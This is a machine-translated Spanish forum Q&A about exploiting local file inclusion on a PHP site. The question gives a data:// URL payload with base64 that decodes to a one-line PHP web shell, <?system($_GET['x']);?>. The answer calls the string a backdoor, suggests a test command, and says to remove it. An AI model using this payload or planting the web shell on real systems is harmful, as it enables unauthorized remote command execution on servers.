Explotación de LFI usando datos: // [cerrado]

Question

#1 de Dr.Ü (1 votos)

-2

Encontré LFI en mi sitio web y traté de explotarlo, pero cuando uso php: // input or data: // no funciona, no puedo obtener el shell.

Ejemplo: .index.php?lang=data:;base64,PD9zeXN0ZW0oJF9HRVRbJ3gnXSk7Pz4=&x=ls -l

He encontrado <?system($_GET['x']);?> impreso en el código fuente de la página (ctrl + f)

web-application xss exploit-development

pregunta Sec Researcher 26.09.2015 - 02:44

fuente

1 respuesta

Lea otras preguntas en las etiquetas web-application xss exploit-development

Robo de contraseña vs Hackeo de cuenta [cerrado] Eliminar un hacker telnet [cerrado]

score 1 · Answer 1

1

<?system($_GET['x']);?>

¡Esto suena como una puerta trasera en su aplicación (Ejecución remota de comandos, no inclusión de archivos)!

Para explotarlo - Prueba: index.php? x = ifconfig 2 > & 1

Para solucionarlo - Quítalo.

respondido por el Dr.Ü 26.09.2015 - 14:10

fuente